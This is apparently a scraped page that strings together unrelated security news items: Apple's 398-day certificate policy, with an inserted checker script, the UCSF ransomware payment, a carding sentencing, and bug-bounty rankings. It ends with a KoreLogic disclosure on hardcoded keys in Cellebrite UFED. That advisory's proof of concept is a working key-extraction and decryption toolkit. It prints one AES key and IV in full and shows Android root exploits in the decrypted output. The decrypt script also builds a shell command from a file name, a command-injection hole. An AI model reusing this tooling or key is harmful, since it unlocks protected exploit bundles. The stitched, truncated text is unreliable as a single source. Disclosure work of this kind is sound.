From September 1, Apple software, from Safari to macOS to iOS, will reject new HTTPS and other SSL/TLS certificates that are valid for more than 398 days, plus or minus some caveats.

If that sounds familiar, it’s because we told you so in February before the iGiant even formally announced the policy. A month later, it revealed the rules with a few exceptions. For example, this policy applies to certificates issued ultimately from root CAs known to Apple’s operating systems, not user or administrator-added CAs.

“Connections to TLS servers violating these new requirements will fail,” Apple warned in its official note. “This might cause network and app failures and prevent websites from loading.”

What this means for netizens is that websites and apps may stop working as expected on Apple gear some time after September 1, if said sites and apps renew or use new encryption certificates that last longer than 398 days. For developers and site admins, that means if you’re creating or renewing certs after September 1, make sure they expire within that time limit, or they won’t work as you expect in Safari, on iOS, and with other Apple software. Users may see error messages or notice connections fail and services break.
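The check a site admin would want from the paragraph above, as an added example that is not from the article, from Apple or from any project the page describes. It applies the two rules the piece states: the validity window (notBefore to notAfter) must be 398 days or less, and the rule only bites for certificates issued on or after September 1, 2020. The sample certificate dicts are constructed for the example in the shape `ssl.SSLSocket.getpeercert()` returns; the function names `validity_days`, `within_apple_limit` and `check_live_host` are my own.

```python
import datetime as dt
import ssl

MAX_VALIDITY_DAYS = 398
# Apple's note applies the limit to server certs issued on or after
# 1 September 2020 00:00 UTC; certificates issued before that are unaffected.
POLICY_START = dt.datetime(2020, 9, 1, tzinfo=dt.timezone.utc)

# Constructed sample certificates (not real certs) in the dict shape that
# ssl.SSLSocket.getpeercert() returns; only the two date fields matter here.
CERT_ONE_YEAR = {
    "subject": ((("commonName", "one-year.example.test"),),),
    "notBefore": "Sep 15 00:00:00 2020 GMT",
    "notAfter": "Sep 15 00:00:00 2021 GMT",
}
CERT_TWO_YEARS = {
    "subject": ((("commonName", "two-year.example.test"),),),
    "notBefore": "Sep 15 00:00:00 2020 GMT",
    "notAfter": "Sep 15 00:00:00 2022 GMT",
}
CERT_PRE_POLICY = {
    "subject": ((("commonName", "old.example.test"),),),
    "notBefore": "Mar 01 00:00:00 2020 GMT",
    "notAfter": "Mar 01 00:00:00 2022 GMT",
}


def validity_days(cert):
    """Length of the validity window, notBefore to notAfter, in days.
    ssl.cert_time_to_seconds parses the 'Sep 15 00:00:00 2020 GMT' format
    that getpeercert() (and openssl x509 -dates) emit."""
    start = ssl.cert_time_to_seconds(cert["notBefore"])
    end = ssl.cert_time_to_seconds(cert["notAfter"])
    return (end - start) / 86400


def within_apple_limit(cert, max_days=MAX_VALIDITY_DAYS):
    """True if the 398-day rule would let this leaf certificate through.
    Simplified: it ignores whether the chain ends in an Apple-trusted root."""
    issued = dt.datetime.fromtimestamp(
        ssl.cert_time_to_seconds(cert["notBefore"]), dt.timezone.utc
    )
    if issued < POLICY_START:
        return True  # issued before the policy start: not subject to the limit
    return validity_days(cert) <= max_days


def check_live_host(host, port=443):
    """Same check against a live server's leaf certificate. Needs network
    access, so it is not exercised in the offline demonstration."""
    import socket
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    return validity_days(cert), within_apple_limit(cert)


if __name__ == "__main__":
    for name, cert in (("one year", CERT_ONE_YEAR),
                       ("two years", CERT_TWO_YEARS),
                       ("pre-policy", CERT_PRE_POLICY)):
        print(name, validity_days(cert), within_apple_limit(cert))
```

The pre-policy sample is the caveat worth remembering: a 730-day certificate issued in March 2020 keeps working on Apple devices until it expires, but its renewal after September 1 must be cut to 398 days or less. The check above also says nothing about the chain; per the policy, certificates from user- or administrator-added roots are outside the rule.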


Apple reckons this policy ensures websites and apps refresh their certs once a year, thus encouraging them to use the latest cryptographic standards, and ensures stolen certs cannot be used for long-running phishing campaigns and other shenanigans as they’ll expire soon enough.

Critics, particularly commercial certificate sellers, say it burdens software makers and site owners with extra costs and hassle, and will drive folks to free services, such as Let’s Encrypt – which, incidentally, offers tools to regularly and automatically renew certificates at no cost.

In any case, Google’s Chrome is set to follow suit, judging by a commit to the Chromium browser engine source code last week.

And Mozilla is preparing to adopt the policy in its Firefox browser. Moz program manager Kathleen Wilson said in March she would have preferred broad industry consensus in favor of the policy before committing to it, though noted: “However, the ball is already rolling.”

Mozilla and other tech giants previously lobbied the CA/Browser Forum – a collective of certificate issuers and browser makers – for shorter cert lifetimes. After those proposals were shot down in a vote, Apple went ahead anyway with a one-year-max policy and bypassed the industry forum, a move backed by the Chromium team. Spokespeople for Mozilla and Google were not available for further comment.

Now all eyes are on Microsoft, which is expected to make a decision on the issue by the Fall.

Suffice to say, certificate sellers were irritated by the change. “The unilateral decision of Apple, against the results of the ballot, makes the CA/B Forum a little bit useless, from our point of view,” sniffed Spanish cert biz Firmaprofesional.

Telia added: “We can manage with the changes but we think that it is an unnecessary burden to our community and we should give more time to them to build their SSL automation, perhaps two more years.” ®


As one of at least three universities hit in June, the school paid $1.14 million to cybercriminals following an attack on “several IT systems” in the UCSF School of Medicine.

The University of California San Francisco paid about $1.14 million to ransomware operators earlier this month after malware compromised several important servers in the UCSF School of Medicine and encrypted them to prevent access, UCSF administrators stated on June 26.

The crypto-ransomware attacks, which have been attributed to the NetWalker group, also reportedly hit Michigan State University and Columbia College of Chicago. UCSF, which has pursued a substantial amount of research on coronavirus and COVID-19, stated that the attacks had not affected that research, nor had an impact on the operations of its medical center and patient care.

However, the ransomware had affected “a limited number of servers” in the medical school, the university said in a statement.

“The data that was encrypted is important to some of the academic work we pursue as a university serving the public good,” the statement said. “We therefore made the difficult decision to pay some portion of the ransom, approximately $1.14 million, to the individuals behind the malware attack in exchange for a tool to unlock the encrypted data and the return of the data they obtained.”

UCSF’s information technology department caught the attack in progress and “quarantined several IT systems within the School of Medicine as a safety measure,” preventing the attack from reaching the “core UCSF network,” the university said in the June 26 statement.

The attack and its million-dollar consequences show that organizations must be able to recognize attacks and stop them much quicker, says Marcus Fowler, director of strategic threat at Darktrace, a threat protection firm.

“I think with ransomware, speed and visibility is going to be the key,” he says. “They are running around and unplugging machines to manage the bleeding, rather than focusing on what happened.”

NetWalker started attacking organizations in 2019, focusing on large, global entities, according to cybersecurity firm SentinelOne. The group uses many generic system tools and tends to favor so-called “living off the land” tactics, in which the attackers rely on utilities already present on the system so that installing malware does not trip detection, Jim Walter, a senior threat researcher at SentinelOne, wrote in a blog post on the group.

In February, the group attacked the Toll Group, an Australian shipping and logistics firm, causing disruptions to the company’s operations and customers, according to media reports. In March 2020, the NetWalker group infected multiple hospitals in Spain, luring victims into opening malicious PDF documents that promised updated information on COVID-19. The latter incident, along with the attack on UCSF, highlights that cybercriminal groups — which had pledged to refrain from attacking hospitals and medical-research facilities during the coronavirus pandemic — cannot be trusted to forgo profits.

NetWalker, in particular, appears to be attacking with abandon — and leaking data, if the organization does not pay, Walter says.

“Consequently, detection and clean-up is no longer sufficient to ensure organizational data remains confidential and secure,” he wrote in the blog post. “Prevention is the only cure for threats like NetWalker, which hit organizations with the double-edged sword of encryption by ransomware and extortion via threats of public data exposure.”

BBC News managed to get a fly-on-the-wall view of the negotiation between UCSF and the NetWalker criminal group — a negotiation that started at $3 million. After some back and forth, the two parties negotiated to 116.4 Bitcoins, or $1.14 million, which the school paid.

The school has notified the FBI and is cooperating with its investigation. The university does not believe that any sensitive medical information was exposed by the attack.

“Our investigation is ongoing but, at this time, we believe that the malware encrypted our servers opportunistically, with no particular area being targeted,” UCSF stated in its statement. “The attackers obtained some data as proof of their action, to use in their demand for a ransom payment.”

The school declined to offer additional details, citing the ongoing federal investigation.

“In order to preserve the integrity of the investigation, we are limited in what we can share at this time and appreciate everyone’s patience as we resolve this situation,” UCSF said in its June 17 statement.


Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …


Aleksei Burkov will go to federal prison for operating two websites built to facilitate payment card fraud, hacking, and other crimes.

Russian national Aleksei Yurievich Burkov has been sentenced to nine years in federal prison for his operation of two websites, CardPlanet and Direct Connection, dedicated to payment card fraud, computer hacking, and other crimes, the Department of Justice said late last week.

CardPlanet was a so-called “carding” website built to sell credit and debit card numbers stolen through computer hacking. Many of the card numbers sold belonged to US citizens, and more than 150,000 stolen payment card numbers were sold on CardPlanet, resulting in at least $20 million in fraudulent purchases made with US payment card accounts.

The price of stolen payment cards ranged from $2.50 to $60 on CardPlanet depending on the card type, country of origin, and availability of cardholder data like name and address. To encourage purchases, Burkov offered a fee-based “checker” service that enabled customers to verify stolen payment card numbers. If a card was invalid, Burkov promised to replace it. He advertised his shop as the only one that would refund the price of invalid payment card data. 

Some customers who bought stolen data from CardPlanet encoded the numbers on counterfeit payment cards embossed with the card company’s logo, without the company’s knowledge or consent, the indictment states. These counterfeit cards were used to buy goods and services across the United States, both in-person and online.

In addition to CardPlanet, the indictment alleges Burkov and his co-conspirators ran an online forum where elite cybercriminals could meet in a secure place to plan crimes, help one another commit crimes and avoid law enforcement, and buy and sell stolen goods and services: payment card numbers, personally identifiable information, botnets, and other malware. While the indictment does not specify the forum’s name, some reports call it Direct Connection.

The forum was divided into several subsections so members could comment on different topics including news, online shopping, buying and selling payment card data, carding documents and equipment, bank account cashouts and bank transfers, and information security topics like databases, botnets, Trojans, scripts, and exploits. Burkov was active on the forum several times per week and used it to drive traffic back to CardPlanet and further his illicit operations there.

Burkov also used this forum to advertise his illegal services and find others selling illicit goods and services he wanted to buy, officials explain in the indictment. He and his co-conspirators controlled access to the forum so as to avoid infiltration. Applicants were required to have three members vouch for them to verify their reputation for, and history of, cybercrime. They had to put up a sum of money – usually around $5,000 – as insurance in case they failed to pay for services on the forum, and all members of the forum had to vote on their acceptance.

“These measures were designed to keep law enforcement from accessing Burkov’s cybercrime forum and to ensure that members of the forum honored any deals made while conducting business on the forum,” officials explain in a statement.

Burkov was arrested at the Ben-Gurion Airport near Tel Aviv, Israel in December 2015; an Israeli district court approved his extradition in 2017. He was extradited to the US in November 2019. In January 2020 he pleaded guilty to one count of access device fraud and one count of conspiracy to commit access device fraud, identity theft, computer intrusions, wire fraud, and money laundering.

A Long Road to Sentencing

It’s rare to see a Russian cybercriminal extradited and sentenced. This sentencing did not arrive without pushback from Moscow, which fought for four years to keep Burkov from being extradited to the United States. As KrebsOnSecurity notes, Israel turned down requests to send the cybercriminal back to Russia, where he allegedly faced other hacking charges. When that didn’t work as planned, Russia imprisoned an Israeli woman in an attempt to trade prisoners.

The FBI and Homeland Security Investigations (HSI), the US agencies charged with bringing cybercriminals to justice, often struggle to get suspects onto US soil for prosecution even with help from Interpol and other agencies. Even where the US has an extradition treaty with a country, that government can decline to extradite individuals on a case-by-case basis.

More than 76 countries do not have an extradition treaty with the US, meaning even known criminals have a low chance of being brought to justice. This is the case with Russia and China, whose citizens are not extradited to the United States. Because of this, US authorities typically monitor the criminals’ activity and try to learn when they plan to travel to another country.

Burkov isn’t the first Russian cybercriminal to be extradited to the United States. Peter Yuryevich Levashov, operator of the Kelihos botnet, was arrested in Barcelona in April 2017 and extradited to the US, where he pleaded guilty in federal court to charges related to the botnet. Russian national Yevgeniy Nikulin, accused of breaking into Dropbox and of the 2012 cyberattack on LinkedIn, was extradited to the US after being detained in the Czech Republic.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial …


Rankings based on total bounties paid, top single bounty paid, time to respond, and more.

HackerOne, a platform on which companies offer bug bounties, has released its annual list of the biggest and most lucrative programs being offered. For the second consecutive year, Verizon Media has the No. 1 program, with more than $9.4 million in bounties paid as of April.

The No. 10 program on the list belongs to Airbnb, which paid a total of $944,000 and a top bounty of $15,000. Between the two were the bug-bounty programs of companies like PayPal, Uber, GitLab, and Mail.ru, which paid total bounties ranging from $3 million to $987,000.

In addition to total bounties paid, the rankings were based on factors including top single bounty paid, time to respond, time to bounty payout, and the number of hackers involved in the program. The top bounty paid was $70,000, by Verizon Media. GitLab had the fastest average response time — one hour — while Twitter had the shortest average time between bug report and bounty payment, at just eight days.


Full Disclosure mailing list archives

KL-001-2020-003 : Cellebrite EPR Decryption Relies on Hardcoded AES Key Material


From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure () seclists org>
Date: Mon, 29 Jun 2020 15:46:42 -0500


Title: Cellebrite EPR Decryption Relies on Hardcoded AES Key Material
Advisory ID: KL-001-2020-003
Publication Date: 2020.06.29
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-003.txt

1. Vulnerability Details

     Affected Vendor: Cellebrite
     Affected Product: UFED
     Affected Version: 5.0 - 7.5.0.845
     Platform: Embedded Windows
     CWE Classification: CWE-321: Use of Hard-coded Cryptographic Key
     CVE ID: CVE-2020-14474

2. Vulnerability Description

The Cellebrite UFED Physical device relies on key material hardcoded within both the executable code supporting the decryption process and within the encrypted files themselves, using a key enveloping technique. The recovered key material is the same for every device running the same version of the software and does not appear to change with each new build. It is possible to reconstruct the decryption process using the hardcoded key material and obtain easy access to otherwise protected data.

3. Technical Description

A recursive listing of my standalone decryptor directory:

     $ find .
     .
     ./decrypt-epr
     ./input
     ./input/DLLs
     ./input/DLLs/731
     ./input/DLLs/731/FileUnpacking.dll
     ./input/EPRs
     ./input/EPRs/731
     ./input/EPRs/731/Android.zip.epr
     ./output
     ./output/EPRs
     ./output/EPRs/731
     ./extract-keys
     ./Makefile

(See the Proof of Concept section for relevant code snippets.)

First, we start by running the extract-keys script on the relevant FileUnpacking.dll file. The provided Makefile will automatically output the relevant key material to the same directory where the DLL resides.

     $ make keys
     Extracting AES keys from input/DLLs/731/FileUnpacking.dll
     64+0 records in
     64+0 records out
     64 bytes copied, 0.000186032 s, 344 kB/s
     32+0 records in
     32+0 records out
     32 bytes copied, 0.000116104 s, 276 kB/s
     636+0 records in
     636+0 records out
     636 bytes copied, 0.00140342 s, 453 kB/s
     Finished

The extract-keys script contains a nested dictionary of known SHA256 values and iterates over the bytes of the file provided, hashing each DWORD. Each calculated hash is compared against the known values and, when one matches, the script extracts the bytes that follow it (the key, the IV or the key map).
Now a selected EPR file may be decrypted. A good example is the Android.zip.epr file, which contains a set of local privilege escalation exploits.

     $ ./decrypt-epr --verbose --file input/EPRs/731/Android.zip.epr
     [+] The EPR file specified exists.
     [+] The specified EPR file has been read into memory.
     [-] Decrypter setup with key 1 for version 3
     [+] Round one of the EPR decryption completed successfully.
     [-] Calculated that the flag will be: [REDACTED]
     [+] The SHA256 key flag has been calculated.
     [-] Found the flag: [REDACTED]
     [+] The SHA256 key flag has been found.
     [-] Decrypter setup with key 2 for version 3
     [+] Round two of the EPR decryption completed successfully. Obtained the final AES key and IV.
     [-] AES Key: [REDACTED], IV: [REDACTED]
     [-] Decrypter setup with key 3 for version 3
     [-] Finished decrypting all blocks.
     [-] Writing bytes to: input/EPRs/731/Android.zip.epr.broken
     [-] Wrote 2552640 bytes to a broken file.
     [+] Round three of the EPR decryption completed successfully. The encrypted zip archive has been decrypted.
     [-] Running: zip -FF input/EPRs/731/Android.zip.epr.broken --out input/EPRs/731/Android.zip.epr.zip > /dev/null 2>&1
     [-] Removing the broken file.
     [+] Decrypted file available at output/EPRs/731/Android.zip.epr.zip
     [+] done.

The decrypted file can then be unzipped.
     $ unzip Android.zip.epr.zip
     Archive:  Android.zip.epr.zip
       inflating: c2a_disable_selinux_32.ko
       inflating: c2a_disable_selinux_64.ko
       inflating: com.mr.meeseeks.apk
       inflating: daemonize
       inflating: dirtycow
       inflating: dirtycow_32
       inflating: DisableHuaweiLogging_2.1.5767a
       inflating: django_2.1.5767a
       inflating: EnableHuaweiLogging_2.1.5767a
       inflating: EnableSharpRead_2.1.5767a
       inflating: exploits_2.1.5769.csv
       inflating: forensics
       inflating: fourrunnerStatic_2.1.5767a
       inflating: gb_2.1.5767a
       inflating: nandd
       inflating: nandread-pie-vold
       inflating: nandread-pie_7182
       inflating: nandread64-pie-vold
       inflating: nandreadStatic_7182
       inflating: patcher.exe
       inflating: pingroot
       inflating: pingroot_vultest
       inflating: psneuter_2.1.5767a
       inflating: RecoveryImageMap.csv
       inflating: rootspotter.apk
       inflating: rootspot_verify_env
       inflating: rosecure_2.1.5767a
       inflating: setuid_2.1.5767a
       inflating: shellcode.bin
       inflating: shellcode_32_iptables.bin
       inflating: shellcode_32_oatdump.bin
       inflating: zergRush_2.1.5767a

The encryption algorithm uses a software-only key enveloping technique in which part of the key material is stored within executable code and part within an encrypted header inside the encrypted file. The encrypted header is extracted from the encrypted file and decrypted using key material hardcoded within the executable code. Some of the decrypted bytes then undergo an XOR operation to calculate the last DWORD of a SHA256 hash. Separately, the 256-byte key map recovered from the DLL is iterated over in 32-byte (64 hex-character) steps. A complete SHA256 hash is generated for each 32-byte candidate and the ending DWORD of that hash is compared against the calculated DWORD. If there is a match, the bytes used to calculate the DWORD are the next set of key material. The decryption tool outputs the following match:

     [-] Calculated that the flag will be: [REDACTED]
     [+] The SHA256 key flag has been calculated.
     [-] Found the flag: [REDACTED]

The last DWORD matches.
In fact there are a total of eight possible intermediate keys that can be chosen from, based on the bytes observed. A third and final key exists within each encrypted file header. This key is decrypted using whichever hardcoded intermediate key was used to encrypt the selected file. From here, bytes 0x80 through the end of the file are decrypted in blocks of 0x10000.

4. Mitigation and Remediation Recommendation

The vendor has informed KoreLogic that this vulnerability is not present on recent versions of the UFED devices. Cellebrite stated, "While the method described in the reports does not work on recent versions (we previously made multiple changes that broke it), the core key material was exposed and will be rotated effective immediately."

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2020.04.02 - KoreLogic submits vulnerability details to Cellebrite.
2020.04.02 - Cellebrite acknowledges receipt and the intention to investigate.
2020.05.13 - KoreLogic requests an update on the status of the vulnerability report.
2020.05.14 - Cellebrite responds, notifying KoreLogic that the technique is not applicable to newer UFED releases. Requests time beyond the standard 45 business day embargo to ensure all exposed keys have been changed.
2020.06.09 - 45 business days have elapsed since the report was submitted to Cellebrite.
2020.06.12 - KoreLogic requests an update from Cellebrite.
2020.06.14 - Cellebrite reports that affected key material has been retired.
2020.06.18 - CVE Requested.
2020.06.19 - MITRE issues CVE-2020-14474.
2020.06.29 - KoreLogic public disclosure.

7. Proof of Concept

File Name: Makefile

clean:
	for filepath in `find input/DLLs -type f -name '*.keys' -o -name '*.aes' -o -name '*.iv' -o -name '*.map' -o -name '*.zip'`; do \
		rm -rf $$filepath ; \
	done

keys:
	@for filepath in `find input/DLLs -type f -name '*.dll'` ; do \
		echo Extracting AES keys from $$filepath ; \
		./extract-keys --file $$filepath > $$filepath.keys ; \
		if [ -f "$$filepath.keys" ] ; then \
			dd bs=1 if=$$filepath.keys count=64 of=$$filepath.aes ; \
			dd bs=1 if=$$filepath.keys count=32 skip=64 of=$$filepath.iv ; \
			dd bs=1 if=$$filepath.keys skip=96 of=$$filepath.map ; \
		else \
			echo Could not find extract-keys output ; \
		fi ; \
	done ; \
	echo Finished

Script Name: extract-keys

#!/usr/bin/python
# Python 2 script. Locates AES key material inside a Cellebrite decryptor DLL
# by hashing every 4-byte window of the file and comparing the digest against
# known SHA256 values, so the advisory can describe the offsets without
# publishing the key bytes themselves.
from optparse import OptionParser
from os.path import exists, basename
from binascii import hexlify
from hashlib import sha256

keyMap = {
    # UFED 5.1
    "Dump_MotGSM.dll": {
        "offsets": {
            "aes": {
                # Key and IV already public information:
                # https://github.com/cellebrited/cellebrite
                "key": "0e282e124bb8af53357f7e8cb3460a23c94def3fe4f181a57c9fcba3f5f7f054",
                "iv": "888c609edc9eb9dfb4d30dfebc9f0431",
            }
        }
    },
    # UFED 7.3
    "FileUnpacking.dll": [
        {
            "offsets": {
                "aes": {
                    "keySize": 32,
                    "keyHash": "[REDACTED]",  # sha256 hash of first dword
                    "ivSize": 16,
                    "ivHash": "[REDACTED]",   # sha256 hash of first dword
                },
                "mapSize": 256,
                "mapHash": "[REDACTED]",      # sha256 hash of first dword
            }
        }
    ],
}

if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("--file", dest="file", default='', help="Decryptor DLL")
    o, a = parser.parse_args()
    if (exists(o.file) != True):
        print "[!] The specified file does not exist"
        exit(1)
    try:
        with open(o.file, 'rb') as fp:
            fileData = fp.read()
        print "[-] Read {} bytes.".format(len(fileData))
        entry = keyMap[basename(o.file)]
        if (isinstance(entry, dict)):
            # Dump_MotGSM.dll: the key and IV are already public, so print them directly.
            print entry["offsets"]["aes"]["key"] + entry["offsets"]["aes"]["iv"]
        else:
            foundKey, foundIV, foundMap = False, False, False
            for i in xrange(0, len(entry)):
                for pos in xrange(0, len(fileData)):
                    # Hash the hex form of each DWORD and compare with the known values.
                    nextDWORD = hexlify(fileData[pos:pos+4])
                    digest = sha256(nextDWORD).hexdigest()
                    if (digest == entry[i]["offsets"]["aes"]["keyHash"] and not foundKey):
                        foundKey = True
                        aesKey = hexlify(fileData[pos:pos+32])
                        print "[+] Found key at {}. Value: {}".format(hex(pos), aesKey)
                    if (digest == entry[i]["offsets"]["aes"]["ivHash"] and not foundIV):
                        foundIV = True
                        aesIV = hexlify(fileData[pos:pos+16])
                        print "[+] Found IV at {}. Value: {}".format(hex(pos), aesIV)
                    if (digest == entry[i]["offsets"]["mapHash"] and not foundMap):
                        foundMap = True
                        aesMap = hexlify(fileData[pos:pos+entry[i]["offsets"]["mapSize"]])
                        print "[+] Found map at {}. Value: {}".format(hex(pos), aesMap)
                    if (foundKey and foundIV and foundMap):
                        break
    except Exception as e:
        print "[!] Could not read the specified file. Reason: {}".format(e)
    exit(0)

Script Name: decrypt-epr

#!/usr/bin/python
# Python 2 script. Replays the three-round EPR key-envelope decryption
# described in section 3 using the material recovered by extract-keys.
from logging.handlers import TimedRotatingFileHandler
from optparse import OptionParser
from os.path import exists, getsize, dirname, realpath
from os.path import join as path_join
from os import system, remove
from shutil import move
from Crypto.Cipher import AES
from binascii import unhexlify, hexlify
from hashlib import sha256
import sys
import logging

logging.basicConfig(
    format="%(asctime)s [%(levelname)s] %(message)s",
    level=logging.INFO,
    handlers=[
        TimedRotatingFileHandler(
            path_join(
                dirname(realpath(__file__)),
                "logger.log",
            ),
            interval=1,
        ),
        logging.StreamHandler(sys.stdout),
    ],
)
logger = logging.getLogger(__name__)

bs = AES.block_size
# PKCS#7-style padding for a trailing partial block
pad = lambda s: s + (bs - len(s) % bs) * chr(bs - len(s) % bs)


class EPR:
    def __init__(self, file, version, verbose):
        # Round-one material: hardcoded in the decryptor DLL.
        self.epr_v1_aes_key = "0e282e124bb8af53357f7e8cb3460a23c94def3fe4f181a57c9fcba3f5f7f054"  # Already public information
        self.epr_v1_aes_iv = "888c609edc9eb9dfb4d30dfebc9f0431"  # Already public information
        self.epr_v2_aes_key = "[REDACTED]"
        self.epr_v2_aes_iv = "[REDACTED]"
        self.epr_v3_aes_key = self.epr_v2_aes_key
        self.epr_v3_aes_iv = self.epr_v2_aes_iv
        # Round-two material: the 256-byte map of eight candidate keys (hex).
        self.epr_v2_aes_map = "[REDACTED]"
        self.epr_v3_aes_map = "[REDACTED]"
        self.epr_v2_aes_iv_two = None
        self.epr_v3_aes_iv_two = None
        self.file = file or False
        self.version = version
        self.encrypted_file = None
        self.encrypted_epr = None
        self.encrypted_magic = None
        self.decrypted_epr = None
        self.final_epr = b''
        self.logging = verbose

    def file_exists(self):
        if not self.file:
            return False
        return exists(self.file)

    def can_read_file(self):
        return getsize(self.file)

    def read_entire_file(self):
        try:
            fp = open(self.file, 'rb')
            self.encrypted_file = fp.read()
            fp.close()
        except Exception as e:
            logger.error("[!] Encountered an exception. Reason: {}".format(e))
            return False
        return True

    def flat_decrypt(self):
        # Round one: strip the 21-byte magic and decrypt with the hardcoded
        # key; the round-two IV sits at offset 32:48 of the result.
        self.encrypted_magic = self.encrypted_file[:21]
        if (self.encrypted_magic[:-2] == "Cellebrite EPR File"):
            self.encrypted_epr = self.encrypted_file[21:]
            if self.version == 1:
                crypter = AES.new(unhexlify(self.epr_v1_aes_key), AES.MODE_CBC, unhexlify(self.epr_v1_aes_iv))
            else:
                crypter = AES.new(unhexlify(self.epr_v3_aes_key), AES.MODE_CBC, unhexlify(self.epr_v3_aes_iv))
            if self.logging:
                logger.info("[-] Decrypter setup with key 1 for version {}".format(self.version))
            try:
                self.decrypted_epr = crypter.decrypt(self.encrypted_epr)
                if self.version == 2:
                    self.epr_v2_aes_iv_two = hexlify(self.decrypted_epr[32:48])
                elif self.version == 3:
                    self.epr_v3_aes_iv_two = hexlify(self.decrypted_epr[32:48])
            except Exception as e:
                logger.error("[!] Encountered an exception. Reason: {}".format(e))
                return False
            return True
        return False

    def calc_sha256_dword(self):
        # XOR the DWORDs at 24:28 and 28:32 of the decrypted header; the
        # result is the trailing DWORD of the SHA256 of the right map entry.
        try:
            to_xor_a = hexlify(self.decrypted_epr[24:28])
            to_xor_a = [to_xor_a[i:i+2] for i in range(0, len(to_xor_a), 2)]
            to_xor_b = hexlify(self.decrypted_epr[28:32])
            to_xor_b = [to_xor_b[i:i+2] for i in range(0, len(to_xor_b), 2)]
            xored_1 = int(to_xor_a[-1], 16) ^ int(to_xor_b[-1], 16)
            xored_1 = "{0:0{1}x}".format(xored_1, 2)
            xored_2 = int(to_xor_a[-2], 16) ^ int(to_xor_b[-2], 16)
            xored_2 = "{0:0{1}x}".format(xored_2, 2)
            xored_3 = int(to_xor_a[-3], 16) ^ int(to_xor_b[-3], 16)
            xored_3 = "{0:0{1}x}".format(xored_3, 2)
            xored_4 = int(to_xor_a[-4], 16) ^ int(to_xor_b[-4], 16)
            xored_4 = "{0:0{1}x}".format(xored_4, 2)
            flag = str(xored_4) + str(xored_3) + str(xored_2) + str(xored_1)
            if (self.version == 2):
                self.epr_v2_sha256_flag = flag
            else:
                self.epr_v3_sha256_flag = flag
            if self.logging:
                logger.info("[-] Calculated that the flag will be: {}".format(flag))
        except Exception as e:
            logger.error("[!] Encountered an exception. Reason: {}".format(e))
            return False
        return True

    def key_map_check(self):
        # Round-two key selection: the 32-byte map entry whose SHA256 ends
        # with the flag is the intermediate key.
        found = False
        if (self.version == 2):
            for i in range(0, len(self.epr_v2_aes_map), 64):
                hash = sha256(unhexlify(self.epr_v2_aes_map[i:i+64])).hexdigest()
                if (hash.endswith(self.epr_v2_sha256_flag)):
                    if self.logging:
                        logger.info("[-] Found the flag: {}".format(self.epr_v2_sha256_flag))
                    found = True
                    self.epr_v2_aes_key_two = self.epr_v2_aes_map[i:i+64]
        else:
            for i in range(0, len(self.epr_v3_aes_map), 64):
                hash = sha256(unhexlify(self.epr_v3_aes_map[i:i+64])).hexdigest()
                if (hash.endswith(self.epr_v3_sha256_flag)):
                    if self.logging:
                        logger.info("[-] Found the flag: {}".format(self.epr_v3_sha256_flag))
                    found = True
                    self.epr_v3_aes_key_two = self.epr_v3_aes_map[i:i+64]
        return found

    def decrypt_key(self):
        # Round two: the intermediate key unwraps the final key from header
        # bytes 48:80; the final IV is read in the clear from 112:128.
        try:
            if (self.version == 2):
                crypter = AES.new(unhexlify(self.epr_v2_aes_key_two), AES.MODE_CBC, unhexlify(self.epr_v2_aes_iv_two))
                if self.logging:
                    logger.info("[-] Decrypter setup with key 2 for version {}".format(self.version))
                self.epr_v2_aes_key_three = hexlify(crypter.decrypt(self.decrypted_epr[48:80]))
                self.epr_v2_aes_iv_three = hexlify(self.decrypted_epr[112:128])
            else:
                crypter = AES.new(unhexlify(self.epr_v3_aes_key_two), AES.MODE_CBC, unhexlify(self.epr_v3_aes_iv_two))
                if self.logging:
                    logger.info("[-] Decrypter setup with key 2 for version {}".format(self.version))
                self.epr_v3_aes_key_three = hexlify(crypter.decrypt(self.decrypted_epr[48:80]))
                self.epr_v3_aes_iv_three = hexlify(self.decrypted_epr[112:128])
        except Exception as e:
            logger.error("[!] Encountered an exception. Reason: {}".format(e))
            return False
        return True

    def decrypt_epr(self):
        # Round three: decrypt the payload after the header in 0x10000 blocks.
        if (self.version == 2):
            crypter = AES.new(unhexlify(self.epr_v2_aes_key_three), AES.MODE_CBC, unhexlify(self.epr_v2_aes_iv_three))
            if self.logging:
                logger.info("[-] AES Key: {}, IV: {}".format(self.epr_v2_aes_key_three, self.epr_v2_aes_iv_three))
        else:
            crypter = AES.new(unhexlify(self.epr_v3_aes_key_three), AES.MODE_CBC, unhexlify(self.epr_v3_aes_iv_three))
            if self.logging:
                logger.info("[-] AES Key: {}, IV: {}".format(self.epr_v3_aes_key_three, self.epr_v3_aes_iv_three))
        if self.logging:
            logger.info("[-] Decrypter setup with key 3 for version {}".format(self.version))
        self.encrypted_epr = self.encrypted_epr[128:]
        for pos in range(0, len(self.encrypted_epr), 65536):
            decryptPart = self.encrypted_epr[pos:pos+65536]
            try:
                self.final_epr += crypter.decrypt(decryptPart)
            except ValueError as e:
                # Trailing partial block: pad it out so AES-CBC accepts it.
                self.final_epr += crypter.decrypt(pad(decryptPart))
        if self.logging:
            logger.info("[-] Finished decrypting all blocks.")
        try:
            if self.logging:
                logger.info("[-] Writing bytes to: {}.broken".format(self.file))
            fp = open("{}.broken".format(self.file), "wb")
            fp.write(self.final_epr)
            fp.close()
            if self.logging:
                logger.info("[-] Wrote {} bytes to a broken file.".format(len(self.final_epr)))
        except Exception as e:
            logger.error("[!] Encountered an exception. Reason: {}".format(e))
            return False
        return True

    def zip_FF(self):
        # The decrypted archive needs its directory repaired; let zip do it.
        if self.logging:
            logger.info("[-] Running: zip -FF {}.broken --out {}.zip > /dev/null 2>&1".format(self.file, self.file))
        system("zip -FF {}.broken --out {}.zip > /dev/null 2>&1".format(self.file, self.file))
        return True

    def finish(self):
        if self.logging:
            logger.info("[-] Removing the broken file.")
        remove("{}.broken".format(self.file))
